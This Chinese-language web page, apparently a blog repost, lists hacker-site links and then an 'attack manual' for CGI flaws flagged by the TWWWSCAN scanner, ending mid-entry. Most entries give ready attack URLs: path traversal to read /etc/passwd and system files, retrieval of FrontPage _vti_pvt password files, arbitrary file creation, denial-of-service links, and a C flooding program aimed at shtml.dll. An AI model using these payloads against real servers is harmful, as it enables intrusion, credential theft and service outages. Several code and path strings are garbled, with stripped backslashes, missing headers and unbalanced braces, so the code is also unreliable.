–http://bau2.uibk.ac.at/matic/security.html
–http://www.securityfocus.com/archive/1
–http://sentinel.deny.de/
–http://sentinel.deny.de/tools.htm
–http://mrbrain.corsaircrew.de/
–http://tlc.discovery.com/convergence/hackers/hackers.html
–http://www.dark-e.com/trojans.shtml
–http://sss.deny.de/
–http://www.xisp.org/
–http://www.icies-home.de/
–http://wolfman.deny.de/
–http://www.outpost9.com/files/WordLists.html
–http://www.cultdeadcow.com/tools/bo.html
–http://xtremet.deny.de/
–http://www.zone-h.org/en/index
–http://rhino.deny.de/
–http://rhino.deny.de/
–http://rhino.securibox.net/triton.php
–http://www.library.2ya.com/
–http://www.programe-site.net/forumi/viewtopic.php?p=28985#28985
–http://igniteds.net/
–http://www.ilitehost.com
–http://www.danzka.dajoob.com/main.php
–http://www.suck-o.com
–http://www.flyninja.net/
–http://www.yaho0o.net/
–http://www.newagehackers.be/
–http://www.princess-of-evil.com/
–http://www.hakin9.org/
–http://www.fish-for-rejects.com/
–http://www.security-illusions.org/
–http://www.triviasecurity.net/

国外黑客站点大全


足矣….

 有饭吃,有书看,有网上,有音乐听,有几个好朋友,还有家人平安快乐,  

足矣……

CGI漏洞

/

####################尊重作者权益,转载时请保留此信息##########################/
/*TWWWSCAN漏洞扫描器CGI漏洞攻击手册*/
/*作者:无用君*/
/*E-MAIL: admin@root.com.cn */
/*Twwwscan是我用过最好的CGI漏洞扫描器之一,很多朋友也非常喜欢它。但最大的问题就是扫描出来的漏洞不知道要如何利用,所以我在网络上找到了twwwscan所有能扫描的漏洞的资料和攻击方法。希望对大家有所帮助。*/
/*欢迎光临网络技术 http://sadan.yeah.net */
/*欢迎光临网络安全技术交流场所“网络论坛” http://www.s8s8.net */
/*欢迎光临我的个人站: http://go5.163.com/~wyjoffice/ */
/#############################################################################/
____________________________________________________________________________________
1.carbo.dll
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog 

http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244] 

Error: (-1007) cannot open file ’C:webcarbohomefile_to_view.htm’ 

查看win.ini文件: c:winntwin.ini: 

http://host/carbo.dll?icatcommand=….winntwin.ini&catalogname=catalog
____________________________________________________________________________________ 

2.uploader.exe
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe
会带你到上传页面,剩下的事就不用我告诉你了把?:)
____________________________________________________________________________________ 

3.search97.vts
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
____________________________________________________________________________________ 

4.newdsn.exe
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
2. D.o.s攻击:提交下列连接请求:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase 

如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务: 

- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示”端口已经被占用”的错误信息。
- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS会产生保护性错误。
____________________________________________________________________________________ 

5.getdrvs.exe
____________________________________________________________________________________
6. _vti_inf.html 

____________________________________________________________________________________
7. service.pwd http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.
攻击方法:
访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。 

____________________________________________________________________________________
8.users.pwd
UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/users.pwd。 

____________________________________________________________________________________
9.authors.pwd
UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/authors.pwd。
____________________________________________________________________________________
10.administrators.pwd
UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/administrators.pwd。 

____________________________________________________________________________________
11.shtml.dll
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. 2. 可信任站点执行脚本:使用如下格式的URL: http://iis5server/_vti_bin/shtml.dll/
3. D.o.s攻击:使用下面的程序可以能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。
#include 
#include 
#include 
#include 
#include  

void Dos(void *chara); 

void main(int argc,char *argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
long lDo ;
if (argc < 2)
{
printf(”Usage: %s IPn”,argv[0]);
exit(1);
return ;
}

wVersionRequested = MAKEWORD( 2, 2 );

err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
return;
}

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 )
{
WSACleanup( );
return;
}

printf(”wait …n”);
for (lDo = 0 ;lDo < 1000;lDo++)
{
//printf(”1n”);
_beginthread(Dos, 0, (void*)argv[1]);
}
Sleep( 1000000L );

void Dos(void *chara)
{
long lLen;
long lDo ;
char *ip ;
char buffer[2000];
struct sockaddr_in serv_addr;
SOCKET sockfd ;
char plusvuln[]=”GET /_vti_bin/shtml.dll/”;
ip= (char*)chara;
memset(buffer,”,2000); 

serv_addr.sin_family =AF_INET;
serv_addr.sin_addr.s_addr = inet_addr(”192.168.0.131″);
serv_addr.sin_port = htons(80); 

if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
{
printf(”Create Socket faild n”);
return ;

if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
{
printf(”Connect faild n”);;
}
else
{
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );
for (lDo = 0 ;lDo < 7000;lDo ++)
{
lLen = send ( sockfd,”postinfdddddddddd”,strlen(”postinfdddddddddd”),0) ;
if (lLen < 0 )
{
printf(”Send faild n”);
return;
}
}
lLen = send ( sockfd,”tzl.html HTTP/1.0nn”,strlen(”tzl.html HTTP/1.0nn”) + 1,0) ;
//recv(sockfd,buffer,2000,0);
//printf(buffer);
//printf(”n”);
}
closesocket(sockfd);

____________________________________________________________________________________
12.shtml.exe
微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。
攻击方法:
提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_vti_bin/shtml.exe/com1.
____________________________________________________________________________________
13.queryhit.htm
如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。
攻击方法:
访问http://www.victim.com/samples/search/queryhit.htm 如果是搜索页面,然后在查找文件对话框里输入以下字符串:[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。
____________________________________________________________________________________
14.Dotdotdot
vqServer及Sybase PowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW中允许连续的点被解释为级连的目录如’cd …’,解释为’cd ….’.而Sybase PowerDynamo,老版本的vqServer允许远程攻击者绕过WEB安全系统横贯到其他目录。
攻击方法:
假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/…………………/config.sys
列出根目录。 http://example.com/../../../../../../
____________________________________________________________________________________
15.advsearch.asp 

____________________________________________________________________________________
16. autoexec.bat
现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来退出HTTP root目录,从而到达上层的目录树中.在URL中使用”../”,攻击者们可以获得WEB SERVER有权读取的任何文件.
攻击方法: http://127.0.0.1:8080/../../../autoexec.bat 这样将读取系统中的autoexec.bat文件
这个漏洞的利用还取决于系统目录的结构而定.
____________________________________________________________________________________
17.achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr
IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:winntsystem32inetsrviisadmpwd
攻击方法:
访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。
____________________________________________________________________________________
18.visadmin.exe
这个漏洞可以在服务器中一直产生临时文件知道服务器的硬盘慢了为止。任何人都可以远程的来完成。
使用使用在cgi-bin中默认的 visadmin.exe (Visitor Administrator)
攻击方法:
提交以下请求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest
____________________________________________________________________________________
19.no-such-file.pl
这个漏洞会暴露其服务器上的路径,当你访问这个页面时会显示类似以下信息:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can’t open